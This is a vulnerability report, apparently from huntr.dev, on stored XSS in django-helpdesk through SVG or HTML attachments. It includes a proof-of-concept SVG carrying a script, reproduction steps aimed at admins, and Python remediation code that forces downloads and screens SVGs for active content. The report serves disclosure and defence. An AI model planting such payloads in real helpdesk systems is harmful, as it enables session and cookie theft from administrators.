Cross-site Scripting (XSS) - Stored in django-helpdesk/django-helpdesk

Reported by noobpk on www.huntr.dev, 2021-11-11 14:18:52
Report ID: 4D7A5FDD-B2DE-467A-ADE0-3F2FB386638E
10
Tags: cross-site scripting, stored xss, upload, attachment, svg, html, django-helpdesk, unauthenticated user, admin, impact, cookie theft

EPSS: 0.001 (Percentile: 21.4%)

Description

Stored XSS via uploading an ‘Attachments’ file in .svg or .html format

Detail

When an attachment is opened, files in some formats are rendered and loaded directly by the browser, in the helpdesk's own origin. This allows arbitrary JavaScript that was injected into the attachment beforehand to execute.

Proof of Concept

// PoC.svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("XSS");
   </script>
</svg>

Steps to Reproduce

Create a ticket as an unauthenticated user

Upload a .svg or .html file as an attachment

The XSS triggers when the admin opens the attachment
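The root cause described above is that the attachment is served inline, so the browser renders it as a document in the helpdesk's origin. The following is an added example of the two server-side controls a defender would apply; it is not django-helpdesk's own code and is written framework-free so it runs stand-alone. The helper names (attachment_response_headers, svg_contains_active_content) and the sample SVG documents are constructed for this illustration; the first sample is the report's PoC.svg, the second is a benign SVG with no script content.

```python
import mimetypes
import re
import xml.etree.ElementTree as ET

# Extensions a browser treats as an active document when served inline.
# Served as a forced download they are inert. (Assumed list; extend as needed.)
ACTIVE_CONTENT_EXTENSIONS = {".svg", ".html", ".htm", ".xhtml", ".xml"}


def attachment_response_headers(filename: str) -> dict:
    """Headers for serving an uploaded helpdesk attachment safely.

    Every attachment gets Content-Disposition: attachment, so the browser saves
    it instead of rendering it in the helpdesk's origin. For types the browser
    would render as a document (SVG, HTML, XML) the declared type is also
    downgraded to application/octet-stream and nosniff is set, and a CSP with
    'sandbox' blocks script execution even if something still renders inline.
    """
    ext = "." + filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    # Keep the download name free of characters that could break the header.
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", filename) or "attachment"
    headers = {
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }
    if ext in ACTIVE_CONTENT_EXTENSIONS:
        headers["Content-Type"] = "application/octet-stream"
    else:
        headers["Content-Type"] = (
            mimetypes.guess_type(filename)[0] or "application/octet-stream"
        )
    return headers


def svg_contains_active_content(svg_bytes: bytes) -> bool:
    """Screening check at upload time: True if an SVG carries <script>
    elements, on* event-handler attributes or javascript: URLs.

    Use this to reject or flag uploads; it does not replace serving the file
    as a download. For untrusted XML in production, parse with defusedxml
    rather than the stdlib parser to also cover entity-expansion attacks.
    """
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError:
        return True  # unparseable input is treated as suspicious
    for el in root.iter():
        tag = el.tag.split("}", 1)[-1].lower()  # strip the XML namespace
        if tag == "script":
            return True
        for attr, value in el.attrib.items():
            name = attr.split("}", 1)[-1].lower()
            if name.startswith("on"):
                return True
            if "javascript:" in value.replace(" ", "").lower():
                return True
    return False


# Constructed sample inputs. POC_SVG is the report's PoC.svg verbatim.
POC_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("XSS");
   </script>
</svg>"""

BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <circle cx="5" cy="5" r="4" fill="green"/>
</svg>"""


if __name__ == "__main__":
    print("PoC.svg flagged:", svg_contains_active_content(POC_SVG))
    print("benign.svg flagged:", svg_contains_active_content(BENIGN_SVG))
    print(attachment_response_headers("PoC.svg"))
```

The headers function is the control that actually closes the reported issue: once the attachment is never rendered in the helpdesk origin, a script inside it has no document to run in and no session cookie to read. The content screen is a second layer that catches the obvious payloads before they are stored at all.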

Impact

This vulnerability has the potential to steal a user’s cookie and gain unauthorized access to that user’s account through the stolen cookie.

